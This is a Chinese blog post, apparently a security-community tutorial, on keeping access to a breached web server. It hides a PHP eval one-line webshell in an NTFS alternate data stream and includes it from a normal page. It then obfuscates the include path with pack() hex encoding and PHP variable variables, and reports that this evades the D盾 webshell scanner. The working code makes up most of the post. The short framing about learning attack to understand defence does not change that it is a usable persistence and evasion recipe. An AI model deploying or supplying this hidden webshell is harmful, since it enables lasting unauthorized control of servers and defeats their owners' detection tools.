【web端权限维持】利用ADS隐藏webshell

简介: 0X01 前言   未知攻,焉知防,在web端如何做手脚维护自己拿到的权限呢?首先要面临的是webshell查杀,那么通过利用ADS隐藏webshell,不失为一个好办法。 0X02 利用ADS隐藏webshell   关于ADS的介绍,就不再阐述,详见尾部参考资料。

0X01 前言

  未知攻,焉知防,在web端如何做手脚维护自己拿到的权限呢?首先要面临的是webshell查杀,那么通过利用ADS隐藏webshell,不失为一个好办法。

0X02 利用ADS隐藏webshell

  关于ADS的介绍,就不再阐述,详见尾部参考资料。

  PHP 一句话木马:<?php @eval($_POST['chopper']);?>,当然也可以直接制作免杀PHP一句话,毕竟PHP千变万化,从变量,数组,赋值,运算,函数等,各种变种。。。

       制作步骤一:创建ADS隐藏文件

       在服务器上echo一个数据流文件进去,比如index.php是网页正常文件,我们可以这样子搞:  

echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg

  这样子就生成了一个不可见的shell hidden.jpg,常规的文件管理器、type命令,dir命令、del命令发现都找不出那个hidden.jpg的。   

       问题1:如何查看index.php:hidden.jpg内容呢?

  进入文件所在目录,notepad index.php:hidden.jpg    或者 dir /r

  问题2:如何删除index.php:hidden.jpg?

       直接删除index.php即可

       制作步骤二:文件包含

  一个正常文件里把这个ADS文件include进去,<?php include(‘index.php:hidden.jpg’)?>,这样子就可以正常解析我们的一句话了。

  但是却非常容易被webshell查杀工具查到,看到可疑引用的文件名,分分钟出局了。

  

 

  制作步骤三:如何绕过检测

  这边要解决的是include函数,如何让它检测不出来有可疑引用文件呢?

  在某次应急响应事件中,获取到一段代码,这里拿来改造一下。代码如下:

<?php
@include(PACK('H*','xx'));
?>

  PHP pack() 函数 函数介绍:http://www.w3school.com.cn/php/func_misc_pack.asp

  将index.php:hidden.jpg进行hex编码

<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>

  再次用D盾_web查杀进行扫描,还是被查到了。

  

  进一步利用PHP 可变变量进行二次转换,最后得到绕过D盾扫描的姿势如下:

<?php 
$a="696E6465782E7068703"."A68696464656E2E6A7067";
$b="a";
include(PACK('H*',$$b))
?>

绕过D盾_web查杀如图:

0X03 最后

  权限维持,也是一门很重要的课题,熟悉各种常见的后门技术,并懂得如何进行安全防御。

 

参考文章:

NTFS中的ADS的一些问题  https://www.i0day.com/733.html

一个用ADS(供选数据流)隐藏Windows后门的方法  http://www.freebuf.com/articles/73270.html

Windows中隐藏文件的捷径---------NTFS文件流(ADS)  http://blog.csdn.net/c395565746c/article/details/5336260

目录
相关文章
|
7月前
|
SQL 安全 PHP
web权限
web权限
58 4
|
JSON 前端开发 NoSQL
web全栈后台权限管理系统(VUE+ElementUi+nodeJs+koa2)
web全栈后台权限管理系统(VUE+ElementUi+nodeJs+koa2)
342 0
|
存储 前端开发 Java
Java Web实战 | 拦截器案例:用户登录权限验证
在配置文件中如果只定义了一个拦截器,程序首先执行拦截器类中的preHandle()方法。如果preHandle()方法返回false,则中断后续所有代码的执行。如果该方法返回true,程序将继续执行处理器以处理请求。当处理器执行过程中没有出现异常时,会执行拦截器中的postHandle()方法。postHandle()方法执行后会通过相关资源向客户端返回响应,并执行拦截器的afterCompletion()方法;如果处理器执行过程中出现异常,将跳过拦截器中的postHandle()方法,直接由前端控制器渲染异常页面返回响应,最后执行拦截器中的afterCompletion()方法。
281 0
VS 无法在web服务器上启动调试。您没有调试web服务器进程的权限
VS 无法在web服务器上启动调试。您没有调试web服务器进程的权限
291 0
VS 无法在web服务器上启动调试。您没有调试web服务器进程的权限
|
数据库 数据安全/隐私保护
SpringSecurity学习(二):Web权限简单使用
SpringSecurity学习(二):Web权限简单使用
130 0
|
安全 网络安全 数据安全/隐私保护
IIS安全:配置web服务器权限更好地实现访问控制
IIS安全:配置web服务器权限更好地实现访问控制
1469 1
|
数据安全/隐私保护
【SVN】关于SVN创建多个版本库共用权限和密码并且设置钩子同步web目录
【SVN】关于SVN创建多个版本库共用权限和密码并且设置钩子同步web目录
162 0
【SVN】关于SVN创建多个版本库共用权限和密码并且设置钩子同步web目录
|
存储 安全 网络安全
web渗透_一句话木马(webshell)_dvwa环境
web渗透_一句话木马(webshell)_dvwa环境
web渗透_一句话木马(webshell)_dvwa环境
|
SQL 关系型数据库 数据安全/隐私保护
基于Python的Flask WEB框架实现后台权限管理系统(建议在windows环境进行部署)
内容包含:用户管理、角色管理、资源管理和机构管理
2053 0
基于Python的Flask WEB框架实现后台权限管理系统(建议在windows环境进行部署)
|
Java Spring
[Spring] Web层AOP方式处理登录和权限问题
参考: [Spring] Web层AOP方式进行参数校验 方法一样,只是把原来登陆和权限校验放在了AOP方法里。 用户权限是存放在session里的。 另外,如果登录时需要在注解里传入角色字段,可以用@Around("aopMethod() && @annotation(loginRequired)")实现。
1016 0